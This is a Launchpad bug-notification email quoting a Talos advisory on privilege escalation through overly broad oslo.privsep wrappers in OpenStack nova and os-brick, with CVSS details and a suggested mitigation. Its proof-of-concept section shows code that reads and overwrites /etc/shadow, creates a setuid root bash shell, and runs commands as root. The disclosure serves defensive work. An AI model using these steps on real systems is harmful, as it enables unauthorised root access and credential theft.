I missed setting the security advisory task to won't fix state when we decided on this as a security hardening opportunity, so have done so now (as it won't have any advisory issued).
** Changed in: ossa Status: Incomplete => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1989008 Title: Lax rulesets leading to privilege escalation vulnerabilities Status in OpenStack Compute (nova): Triaged Status in os-brick: New Status in oslo.privsep: Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: [OpenStack's vulnerability managers received the following report via encrypted E-mail] ### Summary A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges. ### Confirmed Vulnerable Versions The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor. OpenStack git master 05194e7618 ### Product URLs OpenStack - [https://opendev.org/openstack/](https://opendev.org/openstack/) ### CVSSv3 Score 8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H ### CWE CWE-269 - Improper Privilege Management ### Details OpenStack contains a number of tools, libraries, and services for providing simplified, powerful, and scalable cloud based applications. OpenStack's [oslo.privsep](https://opendev.org/openstack/oslo.privsep) library "helps applications perform actions which require more or less privileges ... in a safe, easy to code and easy to use manner." An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as `nova`. The oslo.privsep [design documents](https://docs.openstack.org/oslo.privsep/latest/user/index.html) state the following: Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep. ... Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep] Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The `nova` [module](https://opendev.org/openstack/nova/blob/master/nova/privsep/path.py) contains privileged wrappers for `chmod`, `chown`, `rmdir`, and arbitrary file create/write/move/read. Second, the os_brick [module](https://opendev.org/openstack/os- brick/blob/master/os_brick/privileged/rootwrap.py) contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016: Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). This is intended only as an expedient transition and should be removed ASAP. Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase. ### Crash Information ###### Method 1 (nova) from nova.privsep.path import * from oslo_config.cfg import CONF CONF.privsep_context = 'nova.privsep.sys_admin_pctxt' # Read /etc/shadow last_bytes("/etc/shadow", 1000) # Write to /etc/shadow writefile("/etc/shadow", "wb", b"<payload_here>") # Get a root shell os.system("cp /bin/bash /tmp/bash") chown("/tmp/bash", 0) chmod("/tmp/bash", 0o4755) os.system("/tmp/bash -p") bash-5.1# ###### Method 2 (os_brick) from os_brick.privileged.rootwrap import * from oslo_config.cfg import CONF import shlex # helpful for multi-arg commands CONF.privsep_context = 'os_brick.privileged.default' execute_root(*shlex.split("id")) ('uid=0(root) gid=0(root) groups=0(root)\n', '') ### Mitigation Privileged functions in the `nova` and `os_brick` modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. `chmod(path, mode)` should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files. Suggest auditing other modules that use oslo.privsep to identify similar issues. ### Credit Keane O'Kelley of Cisco ASIG https://talosintelligence.com/vulnerability_reports/ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1989008/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp